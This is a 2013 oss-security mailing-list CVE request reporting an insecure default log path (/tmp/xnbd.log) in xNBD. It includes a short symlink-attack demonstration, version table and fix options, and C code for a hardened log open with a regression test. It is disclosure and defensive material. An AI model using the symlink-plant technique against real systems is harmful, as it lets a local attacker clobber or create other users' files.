Date: Wed, 06 Feb 2013 17:48:59 +0100
From: Sebastian Pipping <sebastian@...ping.org>
To: oss-security@...ts.openwall.com
Subject: CVE request: Insecure default log file path in xNBD
Hello oss-security!
Target software
===============
xNBD upstream
https://bitbucket.org/hirofuchi/xnbd
Official Debian packages
http://packages.debian.org/sid/xnbd-server
Description
===========
xnbd-server (and xnbd-wrapper in some releases) use /tmp/xnbd.log
for logging when parameter --daemonize (and no --logpath FILE) is given.
The file is opened using flags O_WRONLY | O_CREAT | O_APPEND, so it is
vulnerable to symlink attacks.
Demonstration
=============
Here is an exploitation example:
$ ln -s "${HOME}"/ATTACK_TARGET /tmp/xnbd.log
$ touch DISK
$ truncate --size=$((100*1024**2)) DISK
$ /usr/sbin/xnbd-server --daemonize --target DISK
xnbd-server(12462) msg: daemonize enabled
xnbd-server(12462) msg: cmd target mode
xnbd-server(12462) msg: disk DISK size 104857600 B (100 MB)
xnbd-server(12462) msg: xnbd master initialization done
xnbd-server(12462) msg: logfile /tmp/xnbd.log
$ ls -l ~/ATTACK_TARGET
-rw------- 1 user123 user123 653 Feb 1 16:41 \
/home/user123/ATTACK_TARGET
Affected versions
=================
The latest code in the upstream Mercurial repository is not affected
since it does not use logging to /tmp/xnbd.log (or any default
location) any more.
----------------------------------------------------------------------
Version                              Status
----------------------------------------------------------------------
0.0.x                                not analyzed
0.1.0-pre                            VULNERABLE (xnbd-server only)
0.1.0-pre-hg20-e75b93a47722-2        VULNERABLE (xnbd-server and -wrapper)
Mercurial tip                        not vulnerable
----------------------------------------------------------------------
Options for a fix
=================
a) Use syslog with --daemonize and no default file location in general
(i.e. what upstream did)
b) Use /var/log/xnbd-server.log and /var/log/xnbd-wrapper.log
for the hard-coded defaults
c) Replace flag O_APPEND by O_EXCL (secure but reducing functionality)
The attached patch applies approach (b) to version
0.1.0-pre-hg20-e75b93a47722.
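As an added illustration of why the open() flags matter (not part of this post or of the xnbd code), the following C shows a hypothetical hardened log-open built on O_NOFOLLOW plus an fstat() check, and a regression check that plants the same xnbd.log -> ATTACK_TARGET symlink from the demonstration in a private temporary directory and confirms the original flags follow it while the hardened open refuses:

```c
#define _GNU_SOURCE
#include <errno.h>
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <sys/stat.h>
#include <unistd.h>

/* Hypothetical hardened replacement for the open() in the report:
 * O_NOFOLLOW refuses a symlink planted at the log path (errno ELOOP),
 * and the fstat() check rejects anything that is not a regular file
 * owned by the calling user. Returns the fd, or -1 with errno set. */
int open_logfile_safely(const char *path)
{
    int fd = open(path, O_WRONLY | O_CREAT | O_APPEND | O_NOFOLLOW | O_CLOEXEC, 0600);
    if (fd < 0)
        return -1;
    struct stat st;
    if (fstat(fd, &st) < 0 || !S_ISREG(st.st_mode) || st.st_uid != geteuid()) {
        close(fd);
        errno = EPERM;
        return -1;
    }
    return fd;
}

/* Regression check mirroring the report's demonstration inside a private
 * temporary directory: plant xnbd.log -> ATTACK_TARGET, then compare the
 * original flags with the hardened open. Returns 1 when the original
 * open() followed the link (creating ATTACK_TARGET) and the hardened one
 * refused it, 0 otherwise, -1 on setup failure. */
int demo_symlink_refused(void)
{
    char dir[] = "/tmp/xnbd-demo-XXXXXX", target[64], link[64];
    if (mkdtemp(dir) == NULL)
        return -1;
    snprintf(target, sizeof target, "%s/ATTACK_TARGET", dir);
    snprintf(link, sizeof link, "%s/xnbd.log", dir);
    if (symlink(target, link) < 0)
        return -1;
    int hardened = open_logfile_safely(link);
    int refused = (hardened < 0 && errno == ELOOP);
    int insecure = open(link, O_WRONLY | O_CREAT | O_APPEND, 0600); /* flags from 0.1.0-pre */
    int followed = (insecure >= 0 && access(target, F_OK) == 0);
    if (hardened >= 0) close(hardened);
    if (insecure >= 0) close(insecure);
    unlink(target); unlink(link); rmdir(dir);
    return followed && refused;
}
```

Note that O_NOFOLLOW only protects the final path component; a hard-coded path under a world-writable directory such as /tmp remains a poor choice, which is why options (a) and (b) above move the default location rather than only changing flags.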
Best,
Sebastian
View attachment "xnbd-0.1.0-pre-hg20-e75b93a47722-insecure-logging-location.patch" of type "text/x-patch" (6162 bytes)